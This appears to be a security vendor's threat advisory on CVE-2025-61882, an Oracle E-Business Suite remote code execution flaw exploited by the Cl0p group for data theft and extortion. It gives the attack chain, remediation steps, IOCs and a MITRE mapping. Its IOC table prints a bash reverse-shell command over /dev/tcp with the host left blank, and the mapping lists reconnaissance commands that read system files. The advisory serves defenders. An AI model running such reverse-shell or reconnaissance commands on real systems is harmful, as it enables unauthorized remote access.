Oracle EBS – Cl0p – CVE-2025-61882 – GracefulSpider – Remote Code Execution – Unauthorized Access Vulnerability – Extortion – Data Exfiltration
Source Material: Oracle NIST Crowdstrike | Targeted Industries: All
Executive Summary
A critical zero-day vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882, allows unauthenticated remote code execution. Multiple cybersecurity firms, including CrowdStrike and Mandiant, have tied the exploitation of this flaw to Graceful Spider (aka the Cl0p ransomware group), who subsequently sent high-volume extortion emails to victim executives claiming data theft. Oracle released an emergency patch and security alert, strongly recommending immediate updates due to the critical nature of the flaw and the confirmation of in-the-wild exploitation. Additionally, the public disclosure of an exploit by a Telegram channel linked to other threat groups, such as Scattered Spider, has raised concerns about widespread, opportunistic exploitation against unpatched, internet-exposed EBS applications.
Threat Overview and Strategic Impact
The financially motivated threat actor group known as GracefulSpider, or Cl0p, is leading a mass exploitation campaign targeting a critical zero-day vulnerability affecting Oracle E-Business Suite (EBS), CVE-2025-61882. The campaign’s primary objective is large-scale data exfiltration to fuel an aggressive extortion operation, creating a significant financial and reputational risk for any organization dependent on this widely used enterprise software.
The first known exploitation of this vulnerability occurred on August 9, 2025, indicating that threat actors had access to this zero-day flaw for nearly two months before its public disclosure. The malicious activity escalated into a high-volume extortion campaign starting around September 29, 2025, utilizing emails sent from hundreds of compromised accounts to executives, claiming data theft and demanding ransoms reportedly reaching up to $50 million.
This campaign is defined by a combination of a highly critical vulnerability, a notorious and skilled primary threat actor, and a complex ecosystem of other cybercriminal groups. The core details are summarized below:
- Vulnerability: CVE-2025-61882 is a critical unauthenticated Remote Code Execution (RCE) vulnerability with a CVSS score of 9.8. It affects Oracle EBS versions 12.2.3 through 12.2.14, allowing an attacker to take full control of a vulnerable system over the network without needing valid credentials.
- Primary Attributed Actor: We assess with moderate confidence that the financially motivated threat actor GracefulSpider, is the principal driver of this campaign. This group is notorious for exploiting zero-day vulnerabilities in common enterprise systems to steal sensitive data.
- Primary Objective: The actor’s goal is data theft followed by extortion. This is evidenced by a high-volume email campaign targeting company executives with claims of data exfiltration and ransom demands reportedly reaching as high as $50 million.
The public disclosure of a proof-of-concept (POC) exploit and the vulnerability patch on October 3-4, 2025, significantly heightens immediate risk. With the PoC exploit now publicly available, we assess with moderate confidence that other threat actors will quickly develop their own weaponized versions. This will almost certainly shift the threat from targeted attacks by a single sophisticated group to widespread, opportunistic exploitation by a broader range of adversaries, increasing the overall risk for any unpatched organization.
The public friction between Graceful Spider and the Scattered Spider/ShinyHunters collective complicates simple attribution. Their simultaneous exploit sharing and public criticism suggest a competitive and fractured cybercrime environment rather than a purely collaborative one. This makes it more difficult to predict adversary behavior and motives.
The focus on Oracle EBS is a clear indicator of a strategic shift by attackers toward core enterprise applications. These systems are high-value targets because they act as central repositories for an organization’s most sensitive financial, operational, and customer data, making them ideal for high-impact data exfiltration and extortion campaigns
If you have questions or feedback about this intelligence, you can submit them here.
Security Hardening and Actions
Organizations must take immediate, decisive action to prevent and mitigate this critical exposure. Oracle issued an emergency patch for CVE-2025-61882, strongly recommending customers apply these updates as soon as possible. Applying the October 2023 Critical Patch Update is a prerequisite. The U.S. CISA added this vulnerability to its Known Exploited Vulnerabilities catalog, underscoring the urgent need for remediation.
- Patch Application. Oracle strongly recommends applying the security updates for CVE-2025-61882 as soon as possible. Note that the October 2023 Critical Patch Update is a mandatory prerequisite for installing this emergency patch.
- Compromise Assessment. Conduct urgent threat hunting activities to search for evidence of exploitation. Technical teams should focus on the following:
- Investigate all outbound connections originating from Oracle EBS instances, paying special attention to traffic over port 443 to unknown or suspicious destinations.
- Search for malicious templates within the xdo_templates_vl database table. It is recommended to work directly with the Oracle database administrator for this task.
- Investigate for suspicious sessions in icx_sessions associated with UserID 0 (sysadmin) and UserID 6 (guest), which may indicate unauthorized access.
Implement these long-term measures to reduce the organization’s attack surface and improve its overall security posture.
- Minimize the internet-facing attack surface of all Oracle EBS instances wherever possible.
- Consider temporarily disabling internet access for exposed Oracle EBS services until they are fully patched and a thorough compromise assessment has been completed.
- Implement and properly configure a Web Application Firewall (WAF) in front of EBS instances to provide an additional layer of defense against web-based exploits.
- Enforce SSO and Multi-Factor Authentication (MFA) to prevent unauthorized access via local account password resets.
Deepwatch Detections
DeepWatch detections provide visibility into common post-exploitation techniques helping to quickly identify and address a threat actor within the environment. More information on DeepWatch’s detections for this threat can be found on our Customer Security Portal.
Technical Artifacts
These sophisticated tactics are all enabled by the core vulnerability itself, which provides the initial foothold for the entire attack chain. Due to the long exploitation window beginning in August, security teams must conduct comprehensive threat hunting and compromise assessments using the Indicators of Compromise (IOCs) provided by Oracle. Specific hunting activities include searching EBS databases for malicious templates in xdo_templates_vl and investigating suspicious sessions associated with UserID 0 (sysadmin) and UserID 6 (guest) in icx_sessions.
The attack targets Oracle EBS versions 12.2.3–12.2.14, exploiting the BI Publisher Integration component of Oracle Concurrent Processing. The multi-step exploit chain initiates an authentication bypass using an HTTP POST request directed at /OA_HTML/SyncServlet. Adversaries subsequently target the XML Publisher Template Manager by issuing requests to upload and execute a malicious XSLT template. Successful command execution establishes an outbound connection over port 443 to attacker-controlled infrastructure, subsequently used to remotely load web shells for command execution and persistence.
The observed attack methodology follows a multi-step process designed to gain initial access, execute code, and establish long-term persistence on the target system.
- Authentication Bypass: The attack begins with a specially crafted HTTP POST request sent to the /OA_HTML/SyncServlet endpoint. This action initiates an authentication bypass, which in at least one observed case was related to a privileged administrative account within the EBS environment.
- Remote Code Execution: Once inside, the adversary targets Oracle’s XML Publisher Template Manager. Using GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp, they upload a malicious XSLT template. The embedded malicious commands are executed when the system “previews” the template.
- Command and Control (C2): Successful code execution establishes an outbound connection from the compromised server to attacker-controlled infrastructure. This communication channel is typically established over port 443 to blend in with legitimate encrypted web traffic.
- Persistence and Payload Delivery: The C2 channel is used to remotely load web shells onto the compromised server, providing the attacker with persistent access. In one incident, this was achieved through a two-step process: first, a downloader (FileUtils.java) was loaded, which then fetched a backdoor (Log4jConfigQpgsubFilter.java) to create a memory-resident web shell, making it more difficult to detect.
The following IOCs, provided by Oracle, can be used by technical teams for detection and threat hunting activities.
| Indicator Type | Value | Description |
| IP Address | 200.107.207.26 | Potential GET and POST activity observed. |
| IP Address | 185.181.60.11 | Potential GET and POST activity observed. |
| Command | sh -c /bin/bash -i >& /dev/tcp/ / 0>&1 | Establish an outbound TCP connection over a specific port. |
| SHA256 Hash | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| SHA256 Hash | aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| SHA256 Hash | 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Threat Object Mapping
Intrusion Set:
- Graceful Spider, also known as Cl0p ransomware group.
Attack Pattern (MITRE ATT&CK):
| Tactic | Technique | Technique ID | Associated Threat Activity |
| Initial Access | Exploitation of Remote Services (Zero-Day) | T1190 | Adversaries exploited CVE-2025-61882, a critical vulnerability enabling unauthenticated remote code execution (RCE) in Oracle EBS versions 12.2.3–12.2.14. The first known exploitation began on August 9, 2025. |
| Defense Evasion | Authentication Bypass | TA0005 | The activity typically started with an HTTP POST request sent to /OA_HTML/SyncServlet, initiating the authentication-bypass phase of the exploit chain. This bypass mechanism was observed exploiting an administrative account within EBS in at least one incident. |
| Credential Access | Abuse of Local Accounts / Password Reset | TA0006 | Threat actors gained valid credentials by abusing the default password reset function on internet-exposed Oracle EBS portals. This process involved leveraging compromised email accounts to trigger password resets on local EBS accounts, bypassing mandated SSO and MFA protections. |
| Execution | Remote Code Execution via XSLT Template | T1059.008 | The adversary achieved RCE by targeting Oracle’s XML Publisher Template Manager. This involved issuing GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp to upload and execute a malicious XSLT template. Commands embedded in the malicious template executed when the template was previewed. |
| Injection Techniques (SSRF and CRLF) | T1059.008 | The underlying attack chain leveraged Server-Side Request Forgery (SSRF) and Carriage Return/Line Feed (CRLF) injection to force EBS servers to fetch and execute malicious XSL payloads. | |
| Discovery | System Information Discovery | T1082 | Observed commands associated with the exploitation activity included basic system commands used for discovery, such as /cat /etc/fstab/, /cat /etc/hosts/, /df -h/, /ip addr/, and /cat /proc/net/arp/. |
| Command and Control | Standard Application Layer Protocol: Web Protocols | T1071.001 | Successful template execution established an outbound connection from the Java web server process to adversary-controlled infrastructure over port 443. |
| Persistence | Web Shell Deployment | T1505.003 | Following the RCE, the adversary used the outbound connection to remotely load web shell(s) for command execution and persistence. In one case, a web shell was set up using FileUtils.java (downloader) and Log4jConfigQpgsubFilter.java (backdoor), invoked through a filter chain via a public-facing help endpoint. |
| Exfiltration | ExfiltrationOver Web Service | T1567 | The core purpose of the campaign was data exfiltration from the Oracle EBS applications. |
| Impact | Extortion | TA0040 | Graceful Spider (Cl0p) sent high-volume extortion emails, leveraging their Clop branding, claiming sensitive data theft. Reported ransom demands reached up to $50 million. |
Vulnerability:
- CVE-2025-61882
Malware/Tool:
- Webshells:
- FileUtils.java (downloader)
- Log4jConfigQpgsubFilter.java (backdoor)
Additional Sources
- https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
- https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- https://www.virustotal.com/gui/file/aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121/details
- https://github.com/watchtowrlabs/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882/blob/main/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
Share